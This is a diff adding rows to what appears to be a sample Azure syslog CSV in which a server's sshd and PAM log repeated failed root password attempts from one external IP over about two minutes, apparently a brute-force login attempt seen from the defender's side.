+7995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:02,UbuntuDevEnv,2019-06-11 18:49:00,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 49344 ssh2],36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49344,,
+7996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:03,UbuntuDevEnv,2019-06-11 18:49:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 49344 ssh2,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49344,,
+7997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:06,UbuntuDevEnv,2019-06-11 18:49:05,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:06,UbuntuDevEnv,2019-06-11 18:49:05,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 49344 ssh2 [preauth],36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49344,,
+7999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:06,UbuntuDevEnv,2019-06-11 18:49:05,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:06,UbuntuDevEnv,2019-06-11 18:49:05,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 49344: Too many authentication failures [preauth],36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,49344,,
+8001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:06,UbuntuDevEnv,2019-06-11 18:49:05,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 49344 ssh2,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49344,,
+8002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:09,UbuntuDevEnv,2019-06-11 18:49:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:11,UbuntuDevEnv,2019-06-11 18:49:11,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 59226 ssh2,36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59226,,
+8004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:27,UbuntuDevEnv,2019-06-11 18:49:26,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 59226 ssh2],36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59226,,
+8005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:27,UbuntuDevEnv,2019-06-11 18:49:26,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:27,UbuntuDevEnv,2019-06-11 18:49:26,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:27,UbuntuDevEnv,2019-06-11 18:49:26,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 59226 ssh2 [preauth],36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59226,,
+8008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:27,UbuntuDevEnv,2019-06-11 18:49:26,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 59226: Too many authentication failures [preauth],36721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,59226,,
+8009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:32,UbuntuDevEnv,2019-06-11 18:49:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:34,UbuntuDevEnv,2019-06-11 18:49:33,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 2615 ssh2,36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2615,,
+8011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:49,UbuntuDevEnv,2019-06-11 18:49:48,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 2615 ssh2],36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2615,,
+8012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:49,UbuntuDevEnv,2019-06-11 18:49:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:49,UbuntuDevEnv,2019-06-11 18:49:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 2615 ssh2 [preauth],36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2615,,
+8014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:49,UbuntuDevEnv,2019-06-11 18:49:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 2615: Too many authentication failures [preauth],36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,2615,,
+8015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:49,UbuntuDevEnv,2019-06-11 18:49:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:52,UbuntuDevEnv,2019-06-11 18:49:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:49:55,UbuntuDevEnv,2019-06-11 18:49:54,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 10684 ssh2,36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10684,,
+8018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:02,UbuntuDevEnv,2019-06-11 18:50:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 10684 ssh2],36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10684,,
+8019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:03,UbuntuDevEnv,2019-06-11 18:50:03,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 10684 ssh2,36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10684,,
+8020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:09,UbuntuDevEnv,2019-06-11 18:50:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 10684 ssh2 [preauth],36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10684,,
+8021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:09,UbuntuDevEnv,2019-06-11 18:50:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 10684: Too many authentication failures [preauth],36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,10684,,
+8022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:09,UbuntuDevEnv,2019-06-11 18:50:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:09,UbuntuDevEnv,2019-06-11 18:50:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 10684 ssh2],36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10684,,
+8024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:09,UbuntuDevEnv,2019-06-11 18:50:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:13,UbuntuDevEnv,2019-06-11 18:50:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:15,UbuntuDevEnv,2019-06-11 18:50:15,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 18282 ssh2,36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,18282,,
+8027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:30,UbuntuDevEnv,2019-06-11 18:50:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 18282: Too many authentication failures [preauth],36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,18282,,
+8028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:30,UbuntuDevEnv,2019-06-11 18:50:29,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 18282 ssh2],36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,18282,,
+8029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:30,UbuntuDevEnv,2019-06-11 18:50:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:30,UbuntuDevEnv,2019-06-11 18:50:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 18282 ssh2 [preauth],36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,18282,,
+8031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:30,UbuntuDevEnv,2019-06-11 18:50:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:33,UbuntuDevEnv,2019-06-11 18:50:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:36,UbuntuDevEnv,2019-06-11 18:50:35,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 25820 ssh2,37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,25820,,
+8034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:49,UbuntuDevEnv,2019-06-11 18:50:49,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 25820: Too many authentication failures [preauth],37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,25820,,
+8035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:49,UbuntuDevEnv,2019-06-11 18:50:49,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 25820 ssh2],37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,25820,,
+8036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:49,UbuntuDevEnv,2019-06-11 18:50:49,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 25820 ssh2 [preauth],37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,25820,,
+8037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:49,UbuntuDevEnv,2019-06-11 18:50:49,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:49,UbuntuDevEnv,2019-06-11 18:50:49,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:54,UbuntuDevEnv,2019-06-11 18:50:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:50:55,UbuntuDevEnv,2019-06-11 18:50:55,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 33132 ssh2,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:02,UbuntuDevEnv,2019-06-11 18:51:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 33132 ssh2],37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:04,UbuntuDevEnv,2019-06-11 18:51:04,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 33132 ssh2,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:09,UbuntuDevEnv,2019-06-11 18:51:06,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 33132 ssh2,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:10,UbuntuDevEnv,2019-06-11 18:51:09,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 33132 ssh2,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:10,UbuntuDevEnv,2019-06-11 18:51:09,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:10,UbuntuDevEnv,2019-06-11 18:51:09,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 33132: Too many authentication failures [preauth],37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,33132,,
+8047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:10,UbuntuDevEnv,2019-06-11 18:51:09,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:10,UbuntuDevEnv,2019-06-11 18:51:09,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 33132 ssh2 [preauth],37102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,33132,,
+8049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:13,UbuntuDevEnv,2019-06-11 18:51:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:15,UbuntuDevEnv,2019-06-11 18:51:15,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 40910 ssh2,37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40910,,
+8051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:30,UbuntuDevEnv,2019-06-11 18:51:29,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 40910 ssh2],37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40910,,
+8052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:30,UbuntuDevEnv,2019-06-11 18:51:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:30,UbuntuDevEnv,2019-06-11 18:51:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 40910: Too many authentication failures [preauth],37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,40910,,
